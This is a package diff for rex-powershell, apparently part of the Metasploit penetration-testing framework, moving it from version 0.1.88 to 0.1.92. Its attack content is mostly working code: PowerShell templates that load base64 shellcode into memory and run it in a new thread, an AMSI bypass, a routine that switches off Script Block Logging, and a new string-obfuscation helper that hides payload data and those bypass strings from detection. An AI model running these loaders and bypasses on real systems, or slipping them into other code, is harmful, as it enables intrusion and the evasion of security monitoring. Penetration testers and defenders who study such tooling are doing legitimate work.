rex-powershell 0.1.88 → 0.1.92

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 7f7e56d433cb3f985f7b087092a23ff36fc1b110345e08a4b00c82fcdb1db701
-  data.tar.gz: df908df4e6d2b7a6d071e3b24320224661385cbe5ea5ad05c6a6c90c6cef1541
+  metadata.gz: 546de61fbb5ce6c1291c1c922c68db93a408ae3c1fc339acdabc80d2b905f961
+  data.tar.gz: ac1f52f00b5df0ffd34813e5aed34a61ee52da12269173f5a6ff792a01f3c336
 SHA512:
-  metadata.gz: 741ca750ba4f1e1654c873580dfeb1181651eb424c8d4d1ccaf4c474c87730c269a515a2e56c56774e4f4ae5671be5fe2c7bf708b43cad6044ceeb06bcbcd0f9
-  data.tar.gz: a778d9f6c4f375279f1315843b5dbb6766d793a92e34d834d2f3a556b15e6cc35db402e076ba31126e5564f4882bba1421585952d2c4ad3efc7e56e55fdf795b
+  metadata.gz: ce407f2b61f7ccecdfc42ce1bf797e68d2ef3b7a88717735da432e92d9cff2c9511b8a1a0639bf987140076da7a0ccd141f2e5588252c11058d49467b033467e
+  data.tar.gz: efd9530029b6909fa9c7fe9daff2e59ce5167dbf5b25cb3cf67f816aa5528a7589c4b462516d823d429ce508e74cb6aa3be329157ee95eed1a1269b5bd743bd0

data/.github/workflows/verify.yml

@@ -0,0 +1,57 @@
+name: Verify
+
+on:
+  push:
+    branches:
+      - '*'
+  pull_request:
+    branches:
+      - '*'
+
+jobs:
+  test:
+    runs-on: ubuntu-18.04
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - 2.5
+          - 2.6
+          - 2.7
+          - 3.0
+        test_cmd:
+          - bundle exec rspec
+
+    env:
+      RAILS_ENV: test
+
+    name: Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+
+      - uses: actions/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+
+      - name: Setup bundler
+        run: |
+          gem install bundler
+      - uses: actions/cache@v2
+        with:
+          path: vendor/bundle
+          key: ${{ runner.os }}-gems-${{ hashFiles('**/Gemfile.lock') }}
+          restore-keys: |
+            ${{ runner.os }}-gems-
+      - name: Bundle install
+        run: |
+          bundle config path vendor/bundle
+          bundle install --jobs 4 --retry 3
+      - name: ${{ matrix.test_cmd }}
+        run: |
+          echo "${CMD}"
+          bash -c "${CMD}"
+        env:
+          CMD: ${{ matrix.test_cmd }}

data/data/templates/to_mem_dotnet.ps1.template

@@ -5,9 +5,10 @@ $%{var_syscode} = @"
 	namespace %{var_kernel32} {
 		public class func {
 			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
-			[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+			[Flags] public enum MemoryProtection { ReadWrite = 0x04, Execute= 0x10 }
 			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
 			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+			[DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, int flNewProtect,out int lpflOldProtect);
 			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
 			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
 		}
@@ -21,10 +22,14 @@ $%{var_compileParams}.GenerateInMemory = $True
 $%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
 
 [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+[Uint32]$%{var_opf} = 0
 
-$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
+$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ReadWrite)
 if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
 [System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
-[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
-if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
-$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
+
+if ([%{var_kernel32}.func]::VirtualProtect($%{var_baseaddr},[Uint32]$%{var_code}.Length + 1, [%{var_kernel32}.func+MemoryProtection]::Execute, [Ref]$%{var_opf}) -eq $true ) {
+	[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
+	if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
+	$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
+}

data/data/templates/to_mem_pshreflection.ps1.template

@@ -1,27 +1,29 @@
 function %{func_get_proc_address} {
-	Param ($%{var_module}, $%{var_procedure})		
-	$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
-	
-	return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
+        Param ($%{var_module}, $%{var_procedure})
+        $%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
+
+        return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
 }
 
 function %{func_get_delegate_type} {
-	Param (
-		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
-		[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
-	)
-	
-	$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
-	$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
-	$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
-	
-	return $%{var_type_builder}.CreateType()
+        Param (
+                [Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
+                [Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
+        )
+
+        $%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
+        $%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+        $%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+
+        return $%{var_type_builder}.CreateType()
 }
 
 [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
-		
-$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
-[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
+[Uint32]$%{var_opf} = 0
+$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x04)
 
-$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
-[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
+if (([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualProtect), (%{func_get_delegate_type} @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))).Invoke($%{var_buffer}, [Uint32]$%{var_code}.Length, 0x10, [Ref]$%{var_opf})) -eq $true) {
+        $%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
+        [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
+}

data/data/templates/to_mem_rc4.ps1.template

@@ -1,7 +1,7 @@
 function %{func_rc4_decrypt} {
     param([Byte[]]$%{var_rc4buffer})
 
-	$%{var_key} = ([system.Text.Encoding]::UTF8).GetBytes("%{random_key}")
+    $%{var_key} = ([system.Text.Encoding]::UTF8).GetBytes("%{random_key}")
 
     $s = New-Object Byte[] 256;
     $k = New-Object Byte[] 256;

data/lib/rex/powershell/command.rb

@@ -123,6 +123,8 @@ module Command
   #   powershell profile (-NoProfile)
   # @option opts [String] :windowstyle The window style to use
   #   (-WindowStyle)
+  # @option opts [String] :version The version of Powershell to run
+  #   (-version)
   #
   # @return [String] Powershell command arguments
   def self.generate_psh_args(opts)
@@ -157,6 +159,8 @@ module Command
           arg_string << '-NoProfile ' if value
         when :windowstyle
           arg_string << "-WindowStyle #{value} " if value
+        when :version
+          arg_string << "-Version #{value} " if value
       end
     end
 
@@ -188,6 +192,7 @@ module Command
       arg_string.gsub!('-OutputFormat ', '-o ')
       arg_string.gsub!('-Sta ', '-s ')
       arg_string.gsub!('-WindowStyle ', '-w ')
+      arg_string.gsub!('-Version ', '-v ')
     end
 
     # Strip off first space character
@@ -263,6 +268,12 @@ EOS
   # @param opts [Hash] The options to generate the command
   # @option opts [Boolean] :persist Loop the payload to cause
   #   re-execution if the shellcode finishes
+  # @option opts [String] :prepend A stub of Powershell code to prepend to the
+  #   payload.
+  # @option opts [String] :prepend_inner A stub of Powershell code to prepend to
+  #  the inner payload.
+  # @option opts [Boolean] :prepend_protections_bypass Prepend a stub that
+  #   bypasses Powershell protections.
   # @option opts [Integer] :prepend_sleep Sleep for the specified time
   #   before executing the payload
   # @option opts [String] :method The powershell injection technique to
@@ -302,6 +313,14 @@ EOS
         fail RuntimeError, 'No Powershell method specified'
     end
 
+    if opts[:exec_rc4]
+      psh_payload = Rex::Powershell::Payload.to_win32pe_psh_rc4(template_path, psh_payload)
+    end
+
+    if opts[:prepend_inner]
+      psh_payload = opts[:prepend_inner] << (opts[:prepend_inner].end_with?(';') ? '' : ';') << psh_payload
+    end
+
     # Run our payload in a while loop
     if opts[:persist]
       fun_name = Rex::Text.rand_text_alpha(rand(2) + 2)
@@ -317,12 +336,6 @@ EOS
     end
 
     compressed_payload = compress_script(psh_payload, nil, opts)
-
-    if opts[:prepend_protections_bypass]
-      bypass_amsi = Rex::Powershell::PshMethods.bypass_powershell_protections
-      compressed_payload = bypass_amsi + ";" + compressed_payload
-    end
-
     encoded_payload = encode_script(psh_payload, opts)
 
     # This branch is probably never taken...
@@ -345,6 +358,15 @@ EOS
       end
     end
 
+    if opts[:prepend_protections_bypass]
+      bypass_amsi = Rex::Powershell::PshMethods.bypass_powershell_protections
+      smallest_payload = bypass_amsi + ";" + smallest_payload
+    end
+
+    if opts[:prepend]
+      smallest_payload = opts[:prepend] << (opts[:prepend].end_with?(';') ? '' : ';') << smallest_payload
+    end
+
     if opts[:exec_in_place]
       final_payload = smallest_payload
     else
@@ -355,8 +377,8 @@ EOS
     end
 
     command_args = {
-        noprofile: true,
-        windowstyle: 'hidden'
+      noprofile: true,
+      windowstyle: 'hidden'
     }.merge(opts)
 
     if opts[:encode_final_payload]

data/lib/rex/powershell/obfu.rb

@@ -12,6 +12,92 @@ module Powershell
     WHITESPACE_REGEX = Regexp.new(/\s+/)
     EMPTY_LINE_REGEX = Regexp.new(/^$|^\s+$/)
 
+    #
+    # Obfuscate a Powershell literal string value. The character set of the string is limited to alpha-numeric
+    # characters and some punctuation. This routine will use a combination of of techniques including formatting and
+    # concatenation. The result is an expression that can either be passed to a function or assigned to a variable.
+    #
+    # @param [String] string The string value to obfuscate.
+    # @param [Float] threshold A floating point value between 0 and 1 that controls how much of the string is
+    #   obfuscated. Higher values result in more obfuscation while 0 returns the original string without any
+    #   obfuscation.
+    # @return [String] An obfuscated Powershell expression that evaluates to the specified string.
+    def self.scate_string_literal(string, threshold: 0.15)
+      # this hasn't been thoroughly tested for strings that contain alot of punctuation, just simple ones like
+      # 'AmsiUtils', the most important characters that are assumed to be missing are quotes and braces
+      raise ArgumentError.new('string contains an unsupported character') if string =~ /[^a-zA-Z0-9,+=\.\/]/
+      raise ArgumentError.new('threshold must be between 0 and 1') unless threshold.between?(0, 1)
+
+      new = original = string
+      occurrences = {}
+      original.each_char { |char|
+        occurrences[char] = 0 unless occurrences.key?(char)
+        occurrences[char] += 1
+      }
+      char_map = occurrences.group_by { |k,v| v }.sort_by { |k,v| -k }.map { |k,v| v.shuffle }.flatten(1)
+
+      # phase 1
+      format = []
+      char_subs = 0.0
+      while (char_subs / original.length.to_f) < threshold
+        orig_char, occurrence_count = char_map.pop
+        new = new.gsub(/(?<!\{)#{Regexp.escape(orig_char)}(?!\})/, "{#{format.length}}")
+        format << "'#{orig_char}'"
+        char_subs += occurrence_count
+      end
+
+      # phase 2
+      concat = "'+'"
+      positions = threshold > 0 ? (0..new.length).to_a.shuffle[0..(new.length * threshold)] : []
+      positions.sort!
+      positions.each_with_index do |position, index|
+        new = new.insert(position + (index * concat.length), concat)
+      end
+
+      new = "'#{new}'"
+      new = "(#{new})" unless threshold == 0
+
+      final = new
+      final << "-f#{format.join(',')}" unless format.empty?
+      final = "(#{final})" unless format.empty? && threshold == 0
+      final
+    end
+
+    #
+    # Deobfuscate a Powershell literal string value that was previously obfuscated by #scate_string_literal.
+    #
+    # @param [String] string The obfuscated Powershell expression to deobfuscate.
+    # @raises [RuntimeError] If the string can not be deobfuscated, for example because it was randomized using a
+    #   different routine, then an exception is raised.
+    # @return [String] The string literal value.
+    def self.descate_string_literal(string)
+      string = string.strip
+      nest_level = [string.match(/^(\(*)/)[0].length, string.match(/(\)*)$/)[0].length].min
+      string = string[nest_level...-nest_level].strip if nest_level > 0
+      format_args = nil
+      if (string =~ /\((?>[^)(]+|\g<0>)*\)/) == 0
+        format = Regexp.last_match(0)
+        format_args = string[format.length..-1].strip
+        unless format_args =~ /-f\s*('.',\s*)*('.')/
+          raise RuntimeError.new('The obfuscated string structure is unsupported')
+        end
+        format_args = format_args[2..-1].strip.scan(/'(.)'/).map { |match| match[0] }
+        string = format[1...-1].strip
+      end
+
+      unless string =~ /^'.*'$/
+        raise RuntimeError.new('The obfuscated string structure is unsupported')
+      end
+      string = string.gsub(/'\s*\+\s*'/, '') # process all concatenation operations
+      unless format_args.nil? # process all format string operations
+        string = string.gsub(/\{\s*\d+\s*\}/) do |index|
+          format_args[index[1...-1].to_i]
+        end
+      end
+
+      string[1...-1]
+    end
+
     #
     # Remove comments
     #
@@ -45,6 +131,7 @@ module Powershell
     # @return [String] code with whitespace stripped
     def strip_whitespace
       code.gsub!(WHITESPACE_REGEX, ' ')
+      code.strip!
 
       code
     end

data/lib/rex/powershell/output.rb

@@ -50,10 +50,11 @@ module Powershell
       # Base64 encode the compressed file contents
       encoded_stream = Rex::Text.encode_base64(compressed_stream)
 
+
       # Build the powershell expression
       # Decode base64 encoded command and create a stream object
       psh_expression =  "$s=New-Object System.IO.MemoryStream(,"
-      psh_expression << "[System.Convert]::FromBase64String('#{encoded_stream}'));"
+      psh_expression << "[System.Convert]::FromBase64String(#{Obfu.scate_string_literal(encoded_stream, threshold: 0.01)}));"
       # Read & delete the first two bytes due to incompatibility with MS
       psh_expression << '$s.ReadByte();'
       psh_expression << '$s.ReadByte();'
@@ -109,7 +110,7 @@ module Powershell
       # GzipStream operates on the Memory Stream
       psh_expression << '(New-Object System.IO.MemoryStream(,'
       # MemoryStream consists of base64 encoded compressed data
-      psh_expression << "[System.Convert]::FromBase64String('#{encoded_stream}')))"
+      psh_expression << "[System.Convert]::FromBase64String(#{Obfu.scate_string_literal(encoded_stream, threshold: 0.01)})))"
       # Set the GzipStream to decompress its MemoryStream contents
       psh_expression << ',[System.IO.Compression.CompressionMode]::Decompress)'
       # Read the decoded, decompressed result into scriptblock contents
@@ -139,8 +140,15 @@ module Powershell
     #
     # @return [String] Decompressed powershell code
     def decompress_code
-      # Extract substring with payload
-      encoded_stream = @code.scan(/FromBase64String\('(.*)'/).flatten.first
+      # Extract substring with payload4
+      if @code =~ /FromBase64String\('([a-zA-z0-9\+\/=]*)'\)/
+        encoded_stream = Regexp.last_match(1)
+      elsif @code =~ /FromBase64String(\((?>[^)(]+|\g<1>)*\))/
+        encoded_stream = Obfu.descate_string_literal(Regexp.last_match(1))
+      else
+        raise RuntimeError, 'Failed to identify the base64 data'
+      end
+
       # Decode and decompress the string
       unencoded = Rex::Text.decode_base64(encoded_stream)
       begin

data/lib/rex/powershell/payload.rb

@@ -37,10 +37,10 @@ module Payload
   def self.to_win32pe_psh(template_path = TEMPLATE_DIR, code)
     hash_sub = {}
     hash_sub[:var_code] 		= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_win32_func]	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_win32_func]		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_payload] 		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_size] 		= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_rwx] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_rwx]			= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_iter] 		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_syscode] 		= Rex::Text.rand_text_alpha(rand(8)+8)
 
@@ -55,7 +55,6 @@ module Payload
   # Originally from PowerSploit
   #
   def self.to_win32pe_psh_reflection(template_path = TEMPLATE_DIR, code)
-    # Intialize rig and value names
     rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
     rig.init_var(:func_get_proc_address)
     rig.init_var(:func_get_delegate_type)

data/lib/rex/powershell/psh_methods.rb

@@ -90,10 +90,13 @@ module Powershell
     #
     # @return [String] PowerShell code to bypass AMSI
     def self.bypass_amsi()
-      %q{
-        $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
-        $Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
-      }
+      script = Script.new(<<-PSH
+        $Ref=[Ref].Assembly.GetType(#{Obfu.scate_string_literal('System.Management.Automation.AmsiUtils')});
+        $Ref.GetField(#{Obfu.scate_string_literal('amsiInitFailed')},'NonPublic,Static').SetValue($null,$true);
+        PSH
+      )
+      script.sub_vars
+      script
     end
 
     #
@@ -101,22 +104,28 @@ module Powershell
     #
     # @return [String] PowerShell code to bypass Script Block Logging
     def self.bypass_script_log()
-      %q{
-        $GPF=[ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','N'+'onPublic,Static');
-        If($GPF){
+      script = Script.new(<<-PSH
+        $GPF=[ref].Assembly.GetType(#{Obfu.scate_string_literal('System.Management.Automation.Utils')}).GetField(#{Obfu.scate_string_literal('cachedGroupPolicySettings')},'NonPublic,Static');
+        If ($GPF) {
+            $SBL=#{Obfu.scate_string_literal('ScriptBlockLogging')};
+            $EnableSBL=#{Obfu.scate_string_literal('EnableScriptBlockLogging')};
+            $EnableSBIL=#{Obfu.scate_string_literal('EnableScriptBlockInvocationLogging')};
             $GPC=$GPF.GetValue($null);
-            If($GPC['ScriptB'+'lockLogging']){
-                $GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
-                $GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockInvocationLogging']=0
+            If($GPC[$SBL]){
+                $GPC[$SBL][$EnableSBL]=0;
+                $GPC[$SBL][$EnableSBIL]=0;
             }
             $val=[Collections.Generic.Dictionary[string,System.Object]]::new();
-            $val.Add('EnableScriptB'+'lockLogging',0);
-            $val.Add('EnableScriptB'+'lockInvocationLogging',0);
-            $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$val
+            $val.Add($EnableSBL,0);
+            $val.Add($EnableSBIL,0);
+            $GPC['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\'+$SBL]=$val;
         } Else {
-            [ScriptBlock].GetField('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
+            [ScriptBlock].GetField('signatures','NonPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]));
         }
-      }
+        PSH
+      )
+      script.sub_vars
+      script
     end
 
     #

data/lib/rex/powershell/version.rb

@@ -1,5 +1,5 @@
 module Rex
   module Powershell
-    VERSION = "0.1.88"
+    VERSION = "0.1.92"
   end
 end

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: rex-powershell
 version: !ruby/object:Gem::Version
-  version: 0.1.88
+  version: 0.1.92
 platform: ruby
 authors:
 - Metasploit Hackers
@@ -93,7 +93,7 @@ cert_chain:
   EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
   9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
   -----END CERTIFICATE-----
-date: 2020-11-30 00:00:00.000000000 Z
+date: 2021-07-19 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: rake
@@ -173,6 +173,7 @@ executables: []
 extensions: []
 extra_rdoc_files: []
 files:
+- ".github/workflows/verify.yml"
 - ".gitignore"
 - ".rspec"
 - ".travis.yml"

metadata.gz.sig

@@ -1,2 +1,3 @@
-j��C�Q�Q�AJ�1�U�V"};�C�v揠��0�d:��Bl���}^����e�W �8$Db�gI%��O����
-�������f\(�zJ6�b
+�b^��-��Y��B|��a>
+v�Vx~_֚܆�E�άA*:�@�sH�N�+ha<f��q��%Й�-�
��S���h8���UCS:�@5>��5�|5�F�Si���F)f�o�ο2͒�
�����.�O��x�q
+�t�X'@9�PRS��O�EE�#�7��-E����@5�#��